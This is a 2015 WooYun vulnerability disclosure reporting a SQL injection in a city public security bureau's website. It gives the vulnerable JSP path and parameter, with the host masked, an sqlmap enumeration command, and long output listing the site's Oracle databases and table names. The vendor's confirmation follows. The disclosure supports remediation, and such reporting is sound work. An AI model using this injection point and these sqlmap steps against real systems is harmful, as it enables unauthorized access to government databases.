当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153770

漏洞标题:某市公安局分站SQL注入漏洞一枚

相关厂商:公安部一所

漏洞作者: 隔壁老三

提交时间:2015-11-17 16:47

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-17: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

防查水表不深入

详细说明:

又一枚注入

漏洞证明:

注入点 http://**.**.**.**/zjlsga/cmsWebapp/zjls/jsp/zxzx/zxzxDetail.jsp?unid=7FFF5E28F34020285F5E75C6B28DA372
用sqlmap注入
-u "http://**.**.**.**/zjlsga/cmsWebapp/zjls/jsp/zxzx/zxzxDetail.jsp?unid=7FFF5E28F34020285F5E75C6B28DA372" --dbs
available databases [26]:
[*] APEX_030200
[*] APPQOSSYS
[*] APPUCAP
[*] APPWAS
[*] APPWAS1
[*] CESHI
[*] CMS
[*] CMS1
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LSQZJ
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WAS
[*] WMSYS
[*] XDB
Database: CMS
[69 tables]
+------------------------+
| CMS_AD |
| CMS_ADVICE |
| CMS_APAS_RESULT |
| CMS_ARTICLE |
| CMS_ARTICLE_COMMENT |
| CMS_ARTICLE_WORD |
| CMS_CATEGORY |
| CMS_COMPLAINT |
| CMS_COUNSEL |
| CMS_COUNSEL_SUB |
| CMS_DEPT_EXPAND |
| CMS_GRADE |
| CMS_IMPEACH |
| CMS_INDEX |
| CMS_INFOOPEN |
| CMS_INTERVIEW |
| CMS_INTERVIEW_CATEGORY |
| CMS_INTERVIEW_QA |
| CMS_LEADERMAIL |
| CMS_LINK |
| CMS_LINK_CATEGORY |
| CMS_LOST |
| CMS_MSGBOARD |
| CMS_ONLINESURVEY |
| CMS_PERMISSION |
| CMS_PICK_JOB |
| CMS_PICK_LOG |
| CMS_PICK_UNCRAWLER_LOG |
| CMS_PICK_URLVISITED |
| CMS_PUBLISHMAIL |
| CMS_QUESTIONS |
| CMS_RECOMMEND |
| CMS_RECOMMENDINFO |
| CMS_REPLY |
| CMS_SITE |
| CMS_SMS |
| CMS_SOLICIT |
| CMS_SOLICIT_QA |
| CMS_SUGGEST |
| CMS_SUGGEST_MESG |
| CMS_SURVEY |
| CMS_SURVEY_ITEM |
| CMS_SURVEY_LOG |
| CMS_SURVEY_OPINION |
| CMS_SYSDICT |
| CMS_TEMPLATE |
| CMS_VOTE |
| CMS_VOTE_ITEM |
| CMS_VOTE_LOG |
| MONITORLOG |
| ONLINE_BILL |
| ONLINE_BUSINESSDATA |
| ONLINE_CONTACTINFO |
| ONLINE_LOG |
| ONLINE_ORDER |
| ONLINE_PAYITEMS |
| ONLINE_PERMISSIONS |
| SERVERCONFIG |
| SYSTEMCONFIG |
| TMP_P_ARTICLE |
| TMP_P_CLASS |
| UCAP_FW_FLOW_INSTANCE |
| UCAP_FW_FROM_RELATION |
| UCAP_FW_LOG |
| UCAP_FW_OPINION |
| UCAP_FW_TODO |
| UCAP_FW_TRANSFER |
| VALVECONFIG |
| ZJJCONFIG |
+------------------------+
Database: SYSTEM
[161 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS |
| AQ$_INTERNET_AGENT_PRIVS |
| AQ$_QUEUES |
| AQ$_QUEUE_TABLES |
| AQ$_SCHEDULES |
| DEF$_AQCALL |
| DEF$_AQERROR |
| DEF$_CALLDEST |
| DEF$_DEFAULTDEST |
| DEF$_DESTINATION |
| DEF$_ERROR |
| DEF$_LOB |
| DEF$_ORIGIN |
| DEF$_PROPAGATOR |
| DEF$_PUSHED_TRANSACTIONS |
| HELP |
| LOGMNRC_DBNAME_UID_MAP |
| LOGMNRC_GSBA |
| LOGMNRC_GSII |
| LOGMNRC_GTCS |
| LOGMNRC_GTLO |
| LOGMNRGGC_GTCS |
| LOGMNRGGC_GTLO |
| LOGMNRP_CTAS_PART_MAP |
| LOGMNRT_MDDL$ |
| LOGMNR_AGE_SPILL$ |
| LOGMNR_ATTRCOL$ |
| LOGMNR_ATTRIBUTE$ |
| LOGMNR_CCOL$ |
| LOGMNR_CDEF$ |
| LOGMNR_COL$ |
| LOGMNR_COLTYPE$ |
| LOGMNR_DICTIONARY$ |
| LOGMNR_DICTSTATE$ |
| LOGMNR_ENC$ |
| LOGMNR_ERROR$ |
| LOGMNR_FILTER$ |
| LOGMNR_GLOBAL$ |
| LOGMNR_GT_TAB_INCLUDE$ |
| LOGMNR_GT_USER_INCLUDE$ |
| LOGMNR_GT_XID_INCLUDE$ |
| LOGMNR_ICOL$ |
| LOGMNR_IND$ |
| LOGMNR_INDCOMPART$ |
| LOGMNR_INDPART$ |
| LOGMNR_INDSUBPART$ |
| LOGMNR_INTEGRATED_SPILL$ |
| LOGMNR_KOPM$ |
| LOGMNR_LOB$ |
| LOGMNR_LOBFRAG$ |
| LOGMNR_LOG$ |
| LOGMNR_LOGMNR_BUILDLOG |
| LOGMNR_NTAB$ |
| LOGMNR_OBJ$ |
| LOGMNR_OPQTYPE$ |
| LOGMNR_PARAMETER$ |
| LOGMNR_PARTOBJ$ |
| LOGMNR_PROCESSED_LOG$ |
| LOGMNR_PROPS$ |
| LOGMNR_REFCON$ |
| LOGMNR_RESTART_CKPT$ |
| LOGMNR_RESTART_CKPT_TXINFO$ |
| LOGMNR_SEED$ |
| LOGMNR_SESSION$ |
| LOGMNR_SESSION_ACTIONS$ |
| LOGMNR_SESSION_EVOLVE$ |
| LOGMNR_SPILL$ |
| LOGMNR_SUBCOLTYPE$ |
| LOGMNR_TAB$ |
| LOGMNR_TABCOMPART$ |
| LOGMNR_TABPART$ |
| LOGMNR_TABSUBPART$ |
| LOGMNR_TS$ |
| LOGMNR_TYPE$ |
| LOGMNR_UID$ |
| LOGMNR_USER$ |
| LOGSTDBY$APPLY_MILESTONE |
| LOGSTDBY$APPLY_PROGRESS |
| LOGSTDBY$EDS_TABLES |
| LOGSTDBY$EVENTS |
| LOGSTDBY$FLASHBACK_SCN |
| LOGSTDBY$HISTORY |
| LOGSTDBY$PARAMETERS |
| LOGSTDBY$PLSQL |
| LOGSTDBY$SCN |
| LOGSTDBY$SKIP |
| LOGSTDBY$SKIP_SUPPORT |
| LOGSTDBY$SKIP_TRANSACTION |
| MVIEW$_ADV_AJG |
| MVIEW$_ADV_BASETABLE |
| MVIEW$_ADV_CLIQUE |
| MVIEW$_ADV_ELIGIBLE |
| MVIEW$_ADV_EXCEPTIONS |
| MVIEW$_ADV_FILTER |
| MVIEW$_ADV_FILTERINSTANCE |
| MVIEW$_ADV_FJG |
| MVIEW$_ADV_GC |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_INFO |
| MVIEW$_ADV_JOURNAL |
| MVIEW$_ADV_LEVEL |
| MVIEW$_ADV_LOG |
| MVIEW$_ADV_OUTPUT |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARAMETERS |
| MVIEW$_ADV_PARTITION |
| MVIEW$_ADV_PLAN |
| MVIEW$_ADV_PRETTY |
| MVIEW$_ADV_ROLLUP |
| MVIEW$_ADV_SQLDEPEND |
| MVIEW$_ADV_TEMP |
| MVIEW$_ADV_WORKLOAD |
| OL$ |
| OL$HINTS |
| OL$NODES |
| REPCAT$_AUDIT_ATTRIBUTE |
| REPCAT$_AUDIT_COLUMN |
| REPCAT$_COLUMN_GROUP |
| REPCAT$_CONFLICT |
| REPCAT$_DDL |
| REPCAT$_EXCEPTIONS |
| REPCAT$_EXTENSION |
| REPCAT$_FLAVORS |
| REPCAT$_FLAVOR_OBJECTS |
| REPCAT$_GENERATED |
| REPCAT$_GROUPED_COLUMN |
| REPCAT$_INSTANTIATION_DDL |
| REPCAT$_KEY_COLUMNS |
| REPCAT$_OBJECT_PARMS |
| REPCAT$_OBJECT_TYPES |
| REPCAT$_PARAMETER_COLUMN |
| REPCAT$_PRIORITY |
| REPCAT$_PRIORITY_GROUP |
| REPCAT$_REFRESH_TEMPLATES |
| REPCAT$_REPCAT |
| REPCAT$_REPCATLOG |
| REPCAT$_REPCOLUMN |
| REPCAT$_REPGROUP_PRIVS |
| REPCAT$_REPOBJECT |
| REPCAT$_REPPROP |
| REPCAT$_REPSCHEMA |
| REPCAT$_RESOLUTION |
| REPCAT$_RESOLUTION_METHOD |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL |
| REPCAT$_RUNTIME_PARMS |
| REPCAT$_SITES_NEW |
| REPCAT$_SITE_OBJECTS |
| REPCAT$_SNAPGROUP |
| REPCAT$_TEMPLATE_OBJECTS |
| REPCAT$_TEMPLATE_PARMS |
| REPCAT$_TEMPLATE_REFGROUPS |
| REPCAT$_TEMPLATE_SITES |
| REPCAT$_TEMPLATE_STATUS |
| REPCAT$_TEMPLATE_TARGETS |
| REPCAT$_TEMPLATE_TYPES |
| REPCAT$_USER_AUTHORIZATIONS |
| REPCAT$_USER_PARM_VALUES |
| SCHEDULER_JOB_ARGS_TBL |
| SCHEDULER_PROGRAM_ARGS_TBL |
| SQLPLUS_PRODUCT_PROFILE |
+-------------------------------+
Database: CTXSYS
[50 tables]
+-----------------------------+
| DR$ACTIVELOGS |
| DR$AUTOOPT |
| DR$CLASS |
| DR$DBO |
| DR$DELETE |
| DR$FEATURE_USED |
| DR$FREQTOKS |
| DR$INDEX |
| DR$INDEX_CDI_COLUMN |
| DR$INDEX_ERROR |
| DR$INDEX_OBJECT |
| DR$INDEX_PARTITION |
| DR$INDEX_SET |
| DR$INDEX_SET_INDEX |
| DR$INDEX_VALUE |
| DR$NUMBER_SEQUENCE |
| DR$NVTAB |
| DR$OBJECT |
| DR$OBJECT_ATTRIBUTE |
| DR$OBJECT_ATTRIBUTE_LOV |
| DR$ONLINE_PENDING |
| DR$PARALLEL |
| DR$PARAMETER |
| DR$PENDING |
| DR$POLICY_TAB |
| DR$PREFERENCE |
| DR$PREFERENCE_VALUE |
| DR$SDATA_UPDATE |
| DR$SECTION |
| DR$SECTION_ATTRIBUTE |
| DR$SECTION_GROUP |
| DR$SLOWQRYS |
| DR$SQE |
| DR$STATS |
| DR$STOPLIST |
| DR$STOPWORD |
| DR$SUB_LEXER |
| DR$THS |
| DR$THS_BT |
| DR$THS_FPHRASE |
| DR$THS_PHRASE |
| DR$TREE |
| DR$UNINDEXED |
| DR$USER_EXTRACT_ENTDICT |
| DR$USER_EXTRACT_RULE |
| DR$USER_EXTRACT_STOP_ENTITY |
| DR$USER_EXTRACT_TKDICT |
| DR$WAITING |
| SYS_IOT_OVER_56370 |
| SYS_IOT_OVER_56420 |
+-----------------------------+
Database: DBSNMP
[20 tables]
+-----------------------+
| BSLN_BASELINES |
| BSLN_METRIC_DEFAULTS |
| BSLN_STATISTICS |
| BSLN_THRESHOLD_PARAMS |
| BSLN_TIMEGROUPS |
| MGMT_BASELINE |
| MGMT_BASELINE_SQL |
| MGMT_CAPTURE |
| MGMT_CAPTURE_SQL |
| MGMT_DB_FEATURE_LOG |
| MGMT_DB_FILE_GTT |
| MGMT_DB_SIZE_GTT |
| MGMT_HISTORY |
| MGMT_HISTORY_SQL |
| MGMT_LATEST |
| MGMT_LATEST_SQL |
| MGMT_RESPONSE_CONFIG |
| MGMT_SNAPSHOT |
| MGMT_SNAPSHOT_SQL |
| MGMT_TEMPT_SQL |
+-----------------------+

修复方案:

你懂的

版权声明:转载请注明来源 隔壁老三@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-11-24 14:11

厂商回复:

感谢提交!!验证确认所描述的问题,已通知其修复。

最新状态:

暂无


漏洞评价:

评价